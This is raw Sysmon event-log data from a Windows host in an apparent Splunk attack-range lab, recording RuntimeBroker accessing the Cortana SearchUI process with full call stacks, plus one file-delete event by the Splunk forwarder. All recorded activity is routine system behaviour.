10341000x80000000000000001053799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70769396C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.518{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.410{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.410{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 23542300x80000000000000001053782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.394{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40DFB588C0C62B6BE3319200EA236406,SHA256=1DF21E1B2CCC1A554D9643089AFD827FB8B7F0EC55AF35B79890B207A6A1AE23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.365{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
